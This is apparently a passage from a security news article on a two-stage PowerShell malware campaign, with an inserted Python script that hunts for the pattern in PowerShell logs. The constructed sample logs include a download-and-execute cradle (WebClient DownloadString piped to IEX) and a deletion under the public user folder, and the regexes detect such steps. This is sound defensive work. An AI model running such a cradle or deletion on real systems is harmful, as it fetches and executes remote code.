In this case, two PowerShell scripts are used: the first connects to a remote command-and-control (C2) server and retrieves a command, which the second PowerShell script then launches on the compromised machine.
Researchers also say the threat actor made a crucial operations security mistake: victim identifiers were issued in a predictable sequence, making them easy to guess.
During the analysis, a few notable commands were observed, such as exfiltrating the list of running processes, enumerating files in specific folders, running whoami, and deleting files under the public user folders.
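From a detection standpoint, the two-stage pattern described above (a script that pulls a command from a remote server and executes it, followed shortly by process listing, whoami, folder enumeration or deletions under the public user folder) is something a blue team can hunt for in PowerShell script block logs. The following is an added example, not code from the article or the campaign it describes; the log records, host names, timestamps and URL are constructed, and the regular expressions are assumptions about what such script blocks look like.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: (host, ISO timestamp, logged script block text).
# These are illustrative, not logs from the campaign in the article.
SAMPLE_LOGS = [
    ("WS01", "2022-05-10T09:00:05",
     "$c=New-Object Net.WebClient; $cmd=$c.DownloadString('http://example.invalid/task?id=1042'); IEX $cmd"),
    ("WS01", "2022-05-10T09:00:09", "Get-Process | Select-Object Name,Id | Out-String"),
    ("WS01", "2022-05-10T09:00:20", "whoami"),
    ("WS01", "2022-05-10T09:01:00", "Remove-Item -Path C:\\Users\\Public\\*.tmp -Force"),
    ("WS02", "2022-05-10T09:30:00", "Get-ChildItem C:\\Users\\Public\\Documents"),  # no cradle: benign
    ("WS02", "2022-05-10T11:00:00", "Get-Process"),
]

# Stage 1: fetch content from a remote server and hand it to the interpreter.
DOWNLOAD_CRADLE = re.compile(
    r"\b(DownloadString|Invoke-WebRequest|Invoke-RestMethod)\b.*?\b(IEX|Invoke-Expression)\b", re.I | re.S)
# Stage 2: follow-on actions of the kind the article lists (assumed patterns).
FOLLOW_ON = {
    "process listing": re.compile(r"\bGet-Process\b|\btasklist\b", re.I),
    "user identity": re.compile(r"\bwhoami\b", re.I),
    "file enumeration": re.compile(r"\bGet-ChildItem\b", re.I),
    "public folder deletion": re.compile(r"\bRemove-Item\b.*Users\\Public", re.I),
}

def detect_two_stage(logs, window_minutes=5):
    """Return {host: sorted follow-on actions} for every host where a download
    cradle is followed within window_minutes by at least one follow-on action."""
    by_host = defaultdict(list)
    for host, ts, script in logs:
        by_host[host].append((datetime.fromisoformat(ts), script))
    findings = {}
    for host, events in by_host.items():
        events.sort()  # chronological order per host
        for i, (t0, script) in enumerate(events):
            if not DOWNLOAD_CRADLE.search(script):
                continue
            deadline = t0 + timedelta(minutes=window_minutes)
            seen = set()
            for t1, later in events[i + 1:]:
                if t1 > deadline:
                    break
                seen.update(name for name, pat in FOLLOW_ON.items() if pat.search(later))
            if seen:
                findings[host] = sorted(seen)
    return findings

if __name__ == "__main__":
    print(detect_two_stage(SAMPLE_LOGS))  # WS01 flagged, WS02 (no cradle) is not
```

Requiring the cradle first keeps routine administrative use of Get-Process or Get-ChildItem from firing on its own; tune the window and patterns to the environment's own script block logging volume.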
Notably, Microsoft recently changed the default behavior of Office apps to block macros in files downloaded from the internet.
According to reports, Microsoft has taken steps to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros by default across Office apps, prompting threat actors to pivot to alternative delivery methods.
Therefore, researchers say “this unrecognized type of malware managed to bypass all the security vendors’ scanners under VirusTotal.com”.